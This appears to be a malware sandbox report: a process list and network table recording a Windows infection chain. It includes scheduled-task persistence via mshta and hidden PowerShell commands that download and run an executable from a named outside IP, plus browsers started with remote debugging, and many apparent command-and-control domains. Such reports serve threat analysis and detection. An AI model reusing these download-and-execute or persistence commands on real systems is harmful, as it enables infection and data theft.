C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff95bb7cc40,0x7ff95bb7cc4c,0x7ff95bb7cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2016,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2012 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1944,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2136 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1984,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2464 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3192,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3200 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3328,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3236 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4260,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4484 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4476,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4572 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4560,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4576 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4508,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4780 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3848,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4976 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4552,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4596 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5208,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4768 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5016,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5000 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4596,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5088 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5356,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5064 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff95bb846f8,0x7ff95bb84708,0x7ff95bb84718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2008 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2512 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2620 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2928 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3276 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3272 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3204 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3204 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3448 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3860 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\10035810101\9e28748818.exe
"C:\Users\Admin\AppData\Local\Temp\10035810101\9e28748818.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn EVGXOmaAU0L /tr "mshta C:\Users\Admin\AppData\Local\Temp\5gS5yBZTV.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\5gS5yBZTV.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn EVGXOmaAU0L /tr "mshta C:\Users\Admin\AppData\Local\Temp\5gS5yBZTV.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NIKU2KFNSI0OSCJ5SNYFIAJYHYQOJDXS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10035820121\am_no.cmd" "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\10035820121\am_no.cmd" any_word
C:\Users\Admin\AppData\Local\TempNIKU2KFNSI0OSCJ5SNYFIAJYHYQOJDXS.EXE
"C:\Users\Admin\AppData\Local\TempNIKU2KFNSI0OSCJ5SNYFIAJYHYQOJDXS.EXE"
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "XgBsCma2dsa" /tr "mshta \"C:\Temp\ILvKar5Uh.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\ILvKar5Uh.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe
"C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe
"C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe"
C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe
"C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe"
C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe
"C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe
"C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe"
C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe
"C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe"
C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe
"C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe"
C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe
"C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe"
C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe
"C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe"
C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe
"C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2236 -ip 2236
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2236 -s 964
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\ProgramData\eltqgcf\oamb.exe
C:\ProgramData\eltqgcf\oamb.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe
"C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe"
C:\Users\Admin\AppData\Local\Temp\10036430101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10036430101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | calmingtefxtures.run | udp |
| US | 172.67.158.171:443 | calmingtefxtures.run | tcp |
| US | 8.8.8.8:53 | foresctwhispers.top | udp |
| US | 104.21.48.1:443 | foresctwhispers.top | tcp |
| US | 8.8.8.8:53 | tracnquilforest.life | udp |
| US | 104.21.74.230:443 | tracnquilforest.life | tcp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | collapimga.fun | udp |
| US | 172.67.166.247:443 | collapimga.fun | tcp |
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| US | 172.67.166.247:443 | collapimga.fun | tcp |
| US | 172.67.166.247:443 | collapimga.fun | tcp |
| RU | 185.215.113.115:80 | 185.215.113.115 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| NL | 172.217.23.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| NL | 142.250.179.202:443 | ogads-pa.googleapis.com | udp |
| NL | 172.217.168.206:443 | apis.google.com | udp |
| NL | 142.250.179.202:443 | ogads-pa.googleapis.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| NL | 142.251.39.110:443 | play.google.com | udp |
| NL | 142.251.39.110:443 | play.google.com | tcp |
| NL | 142.251.39.110:443 | play.google.com | udp |
| NL | 142.251.39.110:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| NL | 142.251.36.46:443 | clients2.google.com | udp |
| NL | 142.251.36.46:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| NL | 142.250.179.129:443 | clients2.googleusercontent.com | udp |
| US | 8.8.8.8:53 | pirtyoffensiz.bet | udp |
| US | 8.8.8.8:53 | uncertainyelemz.bet | udp |
| US | 8.8.8.8:53 | hobbyedsmoker.live | udp |
| US | 8.8.8.8:53 | dsfljsdfjewf.info | udp |
| US | 8.8.8.8:53 | deaddereaste.today | udp |
| US | 8.8.8.8:53 | subawhipnator.life | udp |
| US | 8.8.8.8:53 | privileggoe.live | udp |
| US | 8.8.8.8:53 | decreaserid.world | udp |
| US | 8.8.8.8:53 | pastedeputten.life | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | disobilittyhell.live | udp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| N/A | 127.0.0.1:9229 | tcp | |
| N/A | 127.0.0.1:9229 | tcp | |
| RU | 185.215.113.115:80 | 185.215.113.115 | tcp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| N/A | 127.0.0.1:9229 | tcp | |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 104.208.16.94:443 | nw-umwatson.events.data.microsoft.com | tcp |
| RU | 185.215.113.115:80 | 185.215.113.115 | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| NL | 107.189.27.66:80 | cobolrationumelawrtewarms.com | tcp |
| DE | 104.194.157.122:80 | 104.194.157.122 | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | decreaserid.world | udp |
| US | 8.8.8.8:53 | uncertainyelemz.bet | udp |
| US | 8.8.8.8:53 | hobbyedsmoker.live | udp |
| US | 8.8.8.8:53 | dsfljsdfjewf.info | udp |
| US | 8.8.8.8:53 | deaddereaste.today | udp |
| US | 8.8.8.8:53 | subawhipnator.life | udp |
| US | 8.8.8.8:53 | privileggoe.live | udp |
| US | 8.8.8.8:53 | pastedeputten.life | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 172.67.158.171:443 | calmingtefxtures.run | tcp |
| US | 104.21.48.1:443 | foresctwhispers.top | tcp |
| US | 8.8.8.8:53 | exarthynature.run | udp |
| US | 104.21.74.230:443 | tracnquilforest.life | tcp |
| US | 104.21.96.1:443 | exarthynature.run | tcp |
| US | 8.8.8.8:53 | presentymusse.world | udp |
| US | 8.8.8.8:53 | deaddereaste.today | udp |
| US | 8.8.8.8:53 | subawhipnator.life | udp |
| US | 8.8.8.8:53 | privileggoe.live | udp |
| US | 8.8.8.8:53 | boltetuurked.digital | udp |
| US | 8.8.8.8:53 | pastedeputten.life | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 104.21.96.1:443 | exarthynature.run | tcp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
